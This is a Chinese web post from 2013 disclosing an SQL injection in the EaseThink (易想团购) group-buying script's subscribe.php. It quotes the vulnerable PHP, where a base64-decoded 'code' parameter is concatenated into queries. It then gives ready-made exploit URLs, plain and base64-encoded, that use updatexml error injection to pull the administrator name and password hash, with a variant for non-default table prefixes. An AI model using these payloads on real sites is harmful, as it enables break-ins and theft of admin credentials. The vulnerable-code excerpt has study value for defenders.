IT技术互动交流平台

易想团购subscribe.php页面存在sql注入漏洞(exp)

发布日期:2013-08-09 20:57:45

易想团购subscribe.php这个页面存在问题

其中除了$_REQUEST['act']=='mail'选项未添加页面发送信息外,其余选项都拼接了用户发送信息。

属于post表单信息。



elseif($_REQUEST['act']=='unsubscribe')
{
        $email_code = trim($_REQUEST['code']);  //只去掉了两端预定义字符
        $email = base64_decode($email_code);   //简单的base64_decode编码 之后就带入了语句 www.it165.net
        if($GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."mail_list where mail_address='".$email."'")==0)
        {
showErr($GLOBALS['lang']['MAIL_NOT_EXIST'],0,APP_ROOT);
        }
        else
        {
send_unsubscribe_mail($email);
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_VERIFY'],0,APP_ROOT);
        }
}
elseif($_REQUEST['act']=='dounsubscribe')
{
        $email_code = trim($_REQUEST['code']); //和以上一样的错误
        $email_code =  base64_decode($email_code);
        $arr = explode("|",$email_code);
        $GLOBALS['db']->query("delete from ".DB_PREFIX."mail_list where code = '".$arr[0]."' and mail_address = '".$arr[1]."'");
        $rs = $GLOBALS['db']->affected_rows();
        if($rs)
        {
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_SUCCESS'],0,APP_ROOT);
        }
        else
        {
showErr($GLOBALS['lang']['MAIL_UNSUBSCRIBE_FAILED'],0,APP_ROOT);
        }
}

可以看到用户输入很简单的带入了sql语句中,不过最终结果并未直接显示在页面上。还是靠页面返回信息来判断语句执行是否成功

exp构造:

http://ha.cker.in/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))#
红色的参数code注入部分base64后:

http://ha.cker.in/subscribe.php?act=unsubscribe&code=c2VjZXInKSBhbmQgKHVwZGF0ZXhtbCgxLGNvbmNhdCgweDNhLChzZWxlY3QgY29uY2F0KGFkbV9uYW1lLDB4M2EsYWRtX3Bhc3N3b3JkKSBmcm9tIGVhc2V0aGlua19hZG1pbiBsaW1pdCAxKSksMSkpIw==
如果不是默认表前缀会报错,修改表前缀后base64编码了再提交。

 
 

修改表前缀

http://ha.cker.in/subscribe.php?act=unsubscribe&code=secer' and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))#
重新提交

http://ha.cker.in/subscribe.php?act=unsubscribe&code=c2VjZXInIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4M2EsKHNlbGVjdCBjb25jYXQoYWRtX25hbWUsMHgzYSxhZG1fcGFzc3dvcmQpIGZyb20gZXNqal9hZG1pbiBsaW1pdCAxKSksMSkpIw==


 
 
Tag标签: 易想团购   subscribe   sql注入漏洞  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规